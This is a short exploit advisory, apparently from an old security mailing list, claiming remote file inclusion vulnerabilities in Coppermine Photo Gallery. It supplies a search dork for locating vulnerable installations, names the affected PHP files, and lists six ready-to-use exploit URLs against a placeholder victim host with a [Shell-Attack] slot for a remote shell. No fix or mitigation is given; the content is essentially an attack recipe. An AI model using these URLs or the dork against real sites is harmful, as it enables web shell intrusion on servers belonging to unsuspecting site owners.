Coppermine Photo Gallery suffers from some remote file inclusion vulnerabilities.
7eb5d1da33c2dbedd23eaf0c9a6a8bdc02a07ecf7399e89e3792449873e5fd14
By Hasadya Raed
Contact : RaeD@BsdMail.Com
------------------------------------
Script : Coppermine Photo Gallery
Expl : Remote Include File
Dork : "Copyright (c) 2003-2006 Coppermine Dev Team"
------------------------------------
B.Files :
image_processor.php
functions.php
picmgmt.inc.php
plugin_api.inc.php
index.php
Exploits :
http://www.Victim.Com/Script_Path/image_processor.php?cmd=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/functions.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/picmgmt.inc.php?cmd=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/plugin_api.inc.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/index.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/pluginmgr.php?path=[Shell-Attack]
----------------------------------------
By Hasadya Raed
--